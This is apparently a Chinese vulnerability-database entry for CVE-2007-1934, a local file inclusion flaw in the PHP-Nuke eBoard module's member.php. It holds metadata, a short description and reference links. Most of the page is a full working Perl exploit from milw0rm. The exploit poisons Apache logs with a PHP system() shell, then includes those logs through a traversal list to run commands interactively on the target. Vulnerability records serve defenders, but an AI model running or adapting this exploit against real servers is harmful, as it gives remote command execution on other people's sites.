EBoard 'member.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112653 漏洞类型 路径遍历
发布时间 2007-04-08 更新时间 2007-04-11
CVE编号 CVE-2007-1934 CNNVD-ID CNNVD-200704-110
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3683
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-110
|漏洞详情
PHP-NukeeBoard的member.php中存在目录遍历漏洞。远程攻击者可以借助GLOBALS[name]参数中的..,包含和运行任意的本地文件。
|漏洞EXP
#!Perl
#
#PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit
#
#Vendor: http://www.complex-berlin.de/modules.php?name=Downloads&d_op=getit&lid=975
#
#
#Coded by bd0rk || SOH-Crew
#
#Greetz: str0ke, TheJT, MereX, mymaster
#

use IO::Socket;
use LWP::Simple;

#ripped

@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

if (@ARGV < 3) {
print "
PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] Local File Inclusion Exploit
###############################################################
Usage: exploit.pl [victim] /modules/eBoard/ [apachepath]
###############################################################
";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print "Code is injecting in logfiles...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "user-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);
print "Write END to exit!\n";
print "If not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connection failed.\n\n";

#now include parameter

print $socket "GET ".$path."member.php?GLOBALS[name]=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";

while ($raspuns = <$socket>)
{

print $raspuns;
}

print "[shell] ";
$cmd = <STDIN>;
}

# milw0rm.com [2007-04-08]
|参考资料

来源:MILW0RM
名称:3683
链接:http://www.milw0rm.com/exploits/3683
来源:VUPEN
名称:ADV-2007-1301
链接:http://www.frsirt.com/english/advisories/2007/1301
来源:OSVDB
名称:34806
链接:http://osvdb.org/34806
来源:XF
名称:eboard-member-file-include(33493)
链接:http://xforce.iss.net/xforce/xfdb/33493
来源:BID
名称:23365
链接:http://www.securityfocus.com/bid/23365
来源:SECUNIA
名称:24806
链接:http://secunia.com/advisories/24806